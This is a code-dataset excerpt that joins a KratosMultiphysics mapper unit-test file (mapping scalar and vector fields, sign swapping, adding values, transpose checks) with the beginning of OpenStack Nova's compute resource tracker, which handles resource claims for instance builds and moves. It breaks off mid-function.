self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, [(-1)*x for x in val])
def test_ADD_VALUES_Map_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE) # set the initial field
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1+val_2)
def test_ADD_VALUES_InverseMap_scalar(self):
val_1 = -571.147
val_2 = 128.336
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val_1+val_2)
def test_ADD_VALUES_Map_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY) # set the initial field
KM.VariableUtils().SetVectorVar(KM.FORCE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val_1+val_2)
def test_ADD_VALUES_InverseMap_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY) # set the initial field
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val_1+val_2)
def test_SWAP_SIGN_and_ADD_VALUES_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE) # set the initial field
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES | KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1-val_2)
def test_Map_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_InverseMap_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_Map_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
def test_InverseMap_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
# def test_UpdateInterface(self):
# pass
# def test_TO_NON_HISTORICAL(self):
# pass
# def test_FROM_NON_HISTORICAL(self):
# pass
# def test_both_NON_HISTORICAL(self):
# pass
def _CheckHistoricalUniformValuesScalar(self, nodes, variable, exp_value):
for node in nodes:
self.assertAlmostEqual(node.GetSolutionStepValue(variable), exp_value)
def _CheckHistoricalUniformValuesVector(self, nodes, variable, exp_value):
for node in nodes:
nodal_val = node.GetSolutionStepValue(variable)
self.assertAlmostEqual(nodal_val[0], exp_value[0])
self.assertAlmostEqual(nodal_val[1], exp_value[1])
self.assertAlmostEqual(nodal_val[2], exp_value[2])
def _CheckUniformValuesScalar(self, entities, variable, exp_value):
for entity in entities:
self.assertAlmostEqual(entity.GetValue(variable), exp_value)
def _CheckUniformValuesVector(self, entities, variable, exp_value):
for entity in entities:
val = entity.GetValue(variable)
self.assertAlmostEqual(val[0], exp_value[0])
self.assertAlmostEqual(val[1], exp_value[1])
self.assertAlmostEqual(val[2], exp_value[2])
def __GetFileName(self, file_appendix):
return os.path.join("result_files", self.mapper_type, self.__class__.__name__ + "_" + file_appendix)
def SetHistoricalNonUniformSolutionScalar(nodes, variable):
for node in nodes:
val = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
node.SetSolutionStepValue(variable, val)
def SetHistoricalNonUniformSolutionVector(nodes, variable):
for node in nodes:
val_1 = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
val_2 = 33*cos(node.X0) + node.Y0*5 + 22*node.Z0
val_3 = 12*sin(node.Y0) + node.Z0*15 + 22*node.X0
node.SetSolutionStepValue(variable, KM.Vector([val_1, val_2, val_3]))
def GetNodes(model_part):
return model_part.GetCommunicator().LocalMesh().Nodes
# return model_part.Nodes # TODO this is the correct version, requires some synchronization though!
| 55.56705
| 158
| 0.745984
|
from __future__ import print_function, absolute_import, division
import KratosMultiphysics as KM
import KratosMultiphysics.MappingApplication as KratosMapping
data_comm = KM.DataCommunicator.GetDefault()
import mapper_test_case
from math import sin, cos
import os
def GetFilePath(file_name):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), file_name)
class BasicMapperTests(mapper_test_case.MapperTestCase):
@classmethod
def setUpMapper(cls, mapper_parameters, switch_sides=False):
if switch_sides:
super(BasicMapperTests, cls).setUpModelParts("cube_quad", "cube_tri")
else:
super(BasicMapperTests, cls).setUpModelParts("cube_tri", "cube_quad")
cls.mapper_type = mapper_parameters["mapper_type"].GetString()
if mapper_parameters.Has("interface_submodel_part_origin"):
cls.interface_model_part_origin = cls.model_part_origin.GetSubModelPart(
mapper_parameters["interface_submodel_part_origin"].GetString())
else:
cls.interface_model_part_origin = cls.model_part_origin
if mapper_parameters.Has("interface_submodel_part_destination"):
cls.interface_model_part_destination = cls.model_part_destination.GetSubModelPart(
mapper_parameters["interface_submodel_part_destination"].GetString())
else:
cls.interface_model_part_destination = cls.model_part_destination
if data_comm.IsDistributed():
cls.mapper = KratosMapping.MapperFactory.CreateMPIMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
else:
cls.mapper = KratosMapping.MapperFactory.CreateMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
def test_Map_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val)
def test_InverseMap_constant_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val)
def test_Map_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val)
def test_InverseMap_constant_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val)
def test_Map_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_origin.Nodes, KM.PRESSURE)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.TEMPERATURE, GetFilePath(self.__GetFileName("map_scalar")))
def test_InverseMap_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_destination.Nodes, KM.TEMPERATURE)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.PRESSURE, GetFilePath(self.__GetFileName("inverse_map_scalar")))
def test_Map_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_origin.Nodes, KM.FORCE)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.VELOCITY, GetFilePath(self.__GetFileName("map_vector")))
def test_InverseMap_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_destination.Nodes, KM.VELOCITY)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.FORCE, GetFilePath(self.__GetFileName("inverse_map_vector")))
def test_SWAP_SIGN_Map_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, -val)
def test_SWAP_SIGN_InverseMap_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, -val)
def test_SWAP_SIGN_Map_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, [(-1)*x for x in val])
def test_SWAP_SIGN_InverseMap_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, [(-1)*x for x in val])
def test_ADD_VALUES_Map_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1+val_2)
def test_ADD_VALUES_InverseMap_scalar(self):
val_1 = -571.147
val_2 = 128.336
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val_1+val_2)
def test_ADD_VALUES_Map_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
KM.VariableUtils().SetVectorVar(KM.FORCE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val_1+val_2)
def test_ADD_VALUES_InverseMap_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val_1+val_2)
def test_SWAP_SIGN_and_ADD_VALUES_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES | KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1-val_2)
def test_Map_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_InverseMap_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_Map_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
def test_InverseMap_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
def _CheckHistoricalUniformValuesScalar(self, nodes, variable, exp_value):
for node in nodes:
self.assertAlmostEqual(node.GetSolutionStepValue(variable), exp_value)
def _CheckHistoricalUniformValuesVector(self, nodes, variable, exp_value):
for node in nodes:
nodal_val = node.GetSolutionStepValue(variable)
self.assertAlmostEqual(nodal_val[0], exp_value[0])
self.assertAlmostEqual(nodal_val[1], exp_value[1])
self.assertAlmostEqual(nodal_val[2], exp_value[2])
def _CheckUniformValuesScalar(self, entities, variable, exp_value):
for entity in entities:
self.assertAlmostEqual(entity.GetValue(variable), exp_value)
def _CheckUniformValuesVector(self, entities, variable, exp_value):
for entity in entities:
val = entity.GetValue(variable)
self.assertAlmostEqual(val[0], exp_value[0])
self.assertAlmostEqual(val[1], exp_value[1])
self.assertAlmostEqual(val[2], exp_value[2])
def __GetFileName(self, file_appendix):
return os.path.join("result_files", self.mapper_type, self.__class__.__name__ + "_" + file_appendix)
def SetHistoricalNonUniformSolutionScalar(nodes, variable):
for node in nodes:
val = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
node.SetSolutionStepValue(variable, val)
def SetHistoricalNonUniformSolutionVector(nodes, variable):
for node in nodes:
val_1 = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
val_2 = 33*cos(node.X0) + node.Y0*5 + 22*node.Z0
val_3 = 12*sin(node.Y0) + node.Z0*15 + 22*node.X0
node.SetSolutionStepValue(variable, KM.Vector([val_1, val_2, val_3]))
def GetNodes(model_part):
return model_part.GetCommunicator().LocalMesh().Nodes
| true
| true
|
1c492bcb27d27789656c4e0b0678b09dd514cab8
| 94,240
|
py
|
Python
|
nova/compute/resource_tracker.py
|
zjzh/nova
|
7bb21723171c59b93e28f5d508c2b6df39220f13
|
[
"Apache-2.0"
] | 1,874
|
2015-01-04T05:18:34.000Z
|
2022-03-31T03:30:28.000Z
|
nova/compute/resource_tracker.py
|
zjzh/nova
|
7bb21723171c59b93e28f5d508c2b6df39220f13
|
[
"Apache-2.0"
] | 40
|
2015-04-13T02:32:42.000Z
|
2022-02-16T02:28:06.000Z
|
nova/compute/resource_tracker.py
|
zjzh/nova
|
7bb21723171c59b93e28f5d508c2b6df39220f13
|
[
"Apache-2.0"
] | 1,996
|
2015-01-04T15:11:51.000Z
|
2022-03-31T11:03:13.000Z
|
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Track resources like memory and disk for a compute host. Provides the
scheduler with useful information about availability through the ComputeNode
model.
"""
import collections
import copy
from keystoneauth1 import exceptions as ks_exc
import os_traits
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
import retrying
from nova.compute import claims
from nova.compute import monitors
from nova.compute import provider_config
from nova.compute import stats as compute_stats
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
from nova.objects import migration as migration_obj
from nova.pci import manager as pci_manager
from nova.pci import request as pci_request
from nova import rpc
from nova.scheduler.client import report
from nova import utils
from nova.virt import hardware
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
COMPUTE_RESOURCE_SEMAPHORE = "compute_resources"
def _instance_in_resize_state(instance):
"""Returns True if the instance is in one of the resizing states.
:param instance: `nova.objects.Instance` object
"""
vm = instance.vm_state
task = instance.task_state
if vm == vm_states.RESIZED:
return True
if vm in [vm_states.ACTIVE, vm_states.STOPPED] and task in (
task_states.resizing_states + task_states.rebuild_states):
return True
return False
def _instance_is_live_migrating(instance):
vm = instance.vm_state
task = instance.task_state
if task == task_states.MIGRATING and vm in [vm_states.ACTIVE,
vm_states.PAUSED]:
return True
return False
class ResourceTracker(object):
"""Compute helper class for keeping track of resource usage as instances
are built and destroyed.
"""
def __init__(self, host, driver, reportclient=None):
self.host = host
self.driver = driver
self.pci_tracker = None
# Dict of objects.ComputeNode objects, keyed by nodename
self.compute_nodes = {}
# Dict of Stats objects, keyed by nodename
self.stats = collections.defaultdict(compute_stats.Stats)
# Set of UUIDs of instances tracked on this host.
self.tracked_instances = set()
self.tracked_migrations = {}
self.is_bfv = {} # dict, keyed by instance uuid, to is_bfv boolean
monitor_handler = monitors.MonitorHandler(self)
self.monitors = monitor_handler.monitors
self.old_resources = collections.defaultdict(objects.ComputeNode)
self.reportclient = reportclient or report.SchedulerReportClient()
self.ram_allocation_ratio = CONF.ram_allocation_ratio
self.cpu_allocation_ratio = CONF.cpu_allocation_ratio
self.disk_allocation_ratio = CONF.disk_allocation_ratio
self.provider_tree = None
# Dict of assigned_resources, keyed by resource provider uuid
# the value is a dict again, keyed by resource class
# and value of this sub-dict is a set of Resource obj
self.assigned_resources = collections.defaultdict(
lambda: collections.defaultdict(set))
# Retrieves dict of provider config data. This can fail with
# nova.exception.ProviderConfigException if invalid or conflicting
# data exists in the provider config files.
self.provider_configs = provider_config.get_provider_configs(
CONF.compute.provider_config_location)
# Set of ids for providers identified in provider config files that
# are not found on the provider tree. These are tracked to facilitate
# smarter logging.
self.absent_providers = set()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def instance_claim(self, context, instance, nodename, allocations,
limits=None):
"""Indicate that some resources are needed for an upcoming compute
instance build operation.
This should be called before the compute node is about to perform
an instance build operation that will consume additional resources.
:param context: security context
:param instance: instance to reserve resources for.
:type instance: nova.objects.instance.Instance object
:param nodename: The Ironic nodename selected by the scheduler
:param allocations: The placement allocation records for the instance.
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs.
:returns: A Claim ticket representing the reserved resources. It can
be used to revert the resource usage if an error occurs
during the instance build.
"""
if self.disabled(nodename):
# instance_claim() was called before update_available_resource()
# (which ensures that a compute node exists for nodename). We
# shouldn't get here but in case we do, just set the instance's
# host and nodename attribute (probably incorrect) and return a
# NoopClaim.
# TODO(jaypipes): Remove all the disabled junk from the resource
# tracker. Servicegroup API-level active-checking belongs in the
# nova-compute manager.
self._set_instance_host_and_node(instance, nodename)
return claims.NopClaim()
# sanity checks:
if instance.host:
LOG.warning("Host field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
if instance.node:
LOG.warning("Node field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
cn = self.compute_nodes[nodename]
pci_requests = instance.pci_requests
claim = claims.Claim(context, instance, nodename, self, cn,
pci_requests, limits=limits)
# self._set_instance_host_and_node() will save instance to the DB
# so set instance.numa_topology first. We need to make sure
# that numa_topology is saved while under COMPUTE_RESOURCE_SEMAPHORE
# so that the resource audit knows about any cpus we've pinned.
instance_numa_topology = claim.claimed_numa_topology
instance.numa_topology = instance_numa_topology
self._set_instance_host_and_node(instance, nodename)
if self.pci_tracker:
# NOTE(jaypipes): ComputeNode.pci_device_pools is set below
# in _update_usage_from_instance().
self.pci_tracker.claim_instance(context, pci_requests,
instance_numa_topology)
claimed_resources = self._claim_resources(allocations)
instance.resources = claimed_resources
# Mark resources in-use and update stats
self._update_usage_from_instance(context, instance, nodename)
elevated = context.elevated()
# persist changes to the compute node:
self._update(elevated, cn)
return claim
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def rebuild_claim(self, context, instance, nodename, allocations,
limits=None, image_meta=None, migration=None):
"""Create a claim for a rebuild operation."""
return self._move_claim(
context, instance, instance.flavor, nodename, migration,
allocations, move_type=fields.MigrationType.EVACUATION,
image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def resize_claim(
self, context, instance, flavor, nodename, migration, allocations,
image_meta=None, limits=None,
):
"""Create a claim for a resize or cold-migration move.
Note that this code assumes ``instance.new_flavor`` is set when
resizing with a new flavor.
"""
return self._move_claim(
context, instance, flavor, nodename, migration,
allocations, image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def live_migration_claim(
self, context, instance, nodename, migration, limits, allocs,
):
"""Builds a MoveClaim for a live migration.
:param context: The request context.
:param instance: The instance being live migrated.
:param nodename: The nodename of the destination host.
:param migration: The Migration object associated with this live
migration.
:param limits: A SchedulerLimits object from when the scheduler
selected the destination host.
:param allocs: The placement allocation records for the instance.
:returns: A MoveClaim for this live migration.
"""
# Flavor and image cannot change during a live migration.
flavor = instance.flavor
image_meta = instance.image_meta
return self._move_claim(
context, instance, flavor, nodename, migration, allocs,
move_type=fields.MigrationType.LIVE_MIGRATION,
image_meta=image_meta, limits=limits,
)
def _move_claim(
self, context, instance, new_flavor, nodename, migration, allocations,
move_type=None, image_meta=None, limits=None,
):
"""Indicate that resources are needed for a move to this host.
Move can be either a migrate/resize, live-migrate or an
evacuate/rebuild operation.
:param context: security context
:param instance: instance object to reserve resources for
:param new_flavor: new flavor being resized to
:param nodename: The Ironic nodename selected by the scheduler
:param migration: A migration object if one was already created
elsewhere for this operation (otherwise None)
:param allocations: the placement allocation records.
:param move_type: move type - can be one of 'migration', 'resize',
'live-migration', 'evacuate'
:param image_meta: instance image metadata
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs
:returns: A Claim ticket representing the reserved resources. This
should be turned into finalize a resource claim or free
resources after the compute operation is finished.
"""
image_meta = image_meta or {}
if migration:
self._claim_existing_migration(migration, nodename)
else:
migration = self._create_migration(
context, instance, new_flavor, nodename, move_type)
if self.disabled(nodename):
# compute_driver doesn't support resource tracking, just
# generate the migration record and continue the resize:
return claims.NopClaim(migration=migration)
cn = self.compute_nodes[nodename]
# TODO(moshele): we are recreating the pci requests even if
# there was no change on resize. This will cause allocating
# the old/new pci device in the resize phase. In the future
# we would like to optimise this.
new_pci_requests = pci_request.get_pci_requests_from_flavor(
new_flavor)
new_pci_requests.instance_uuid = instance.uuid
# On resize merge the SR-IOV ports pci_requests
# with the new instance flavor pci_requests.
if instance.pci_requests:
for request in instance.pci_requests.requests:
if request.source == objects.InstancePCIRequest.NEUTRON_PORT:
new_pci_requests.requests.append(request)
claim = claims.MoveClaim(context, instance, nodename,
new_flavor, image_meta, self, cn,
new_pci_requests, migration, limits=limits)
claimed_pci_devices_objs = []
# TODO(artom) The second part of this condition should not be
# necessary, but since SRIOV live migration is currently handled
# elsewhere - see for example _claim_pci_for_instance_vifs() in the
# compute manager - we don't do any PCI claims if this is a live
# migration to avoid stepping on that code's toes. Ideally,
# MoveClaim/this method would be used for all live migration resource
# claims.
if self.pci_tracker and not migration.is_live_migration:
# NOTE(jaypipes): ComputeNode.pci_device_pools is set below
# in _update_usage_from_instance().
claimed_pci_devices_objs = self.pci_tracker.claim_instance(
